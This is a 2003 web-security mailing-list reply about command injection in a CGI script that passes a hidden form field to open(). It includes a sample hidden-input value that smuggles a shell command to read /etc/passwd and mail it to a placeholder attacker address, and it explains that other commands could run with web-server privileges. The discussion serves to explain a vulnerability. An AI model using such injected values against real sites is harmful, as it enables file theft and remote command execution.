WebApp Sec mailing list archives
Re: htaccess with apache
From: Tim Tompkins <timt () spiderlinks org>
Date: Tue, 04 Nov 2003 13:48:15 -0700
A.D.Douma wrote:
It depends on how the open() is called. If the form value is used literally in an open(), you could construct a value such as, <input type="hidden" name="success" value="`cat /etc/passwd|mail attacker () somewhere com`|"> and have the password file mailed to you. Granted, this is a round-about way of reading the passwd file given that a non-santized value is anticipated to be passed in the attack, but other commands could be constructed in the same manner and executed under the privileges of the web server.Hello, I had a similair problem with a cgi script that used a <input type='hidden' name='success' value=succes.'html'> to point the clients browser to the "transaction complete page". Because of this an attacker could read every file on the webserver. Luckily the /etc/passwd file was shadowed. My question is what else could an attacker do? Would command execution be possible? Thanks
-- Tim Tompkins
Current thread:
- htaccess with apache Hans Mueller (Nov 04)
- Re: htaccess with apache David Precious (Nov 04)
- Re: htaccess with apache Graham Lally (Nov 04)
- Re: htaccess with apache Tim Greer (Nov 04)
- Re: htaccess with apache A.D.Douma (Nov 04)
- Re: htaccess with apache Tim Greer (Nov 04)
- Re: htaccess with apache Sverre H. Huseby (Nov 04)
- Re: htaccess with apache Tim Tompkins (Nov 04)
- Re: htaccess with apache Lucas Holt (Nov 04)
- Re: htaccess with apache A.D.Douma (Nov 05)
- Re: htaccess with apache Tim Greer (Nov 04)
- Re: htaccess with apache Graham Lally (Nov 04)
- Re: htaccess with apache Tim Greer (Nov 04)
- Re: htaccess with apache António Vasconcelos (Nov 05)
- Re: htaccess with apache Tim Greer (Nov 05)
- Re: htaccess with apache António Vasconcelos (Nov 06)
- Re: htaccess with apache Tim Greer (Nov 06)
- Re: htaccess with apache António Vasconcelos (Nov 11)
- Re: htaccess with apache Tim Greer (Nov 11)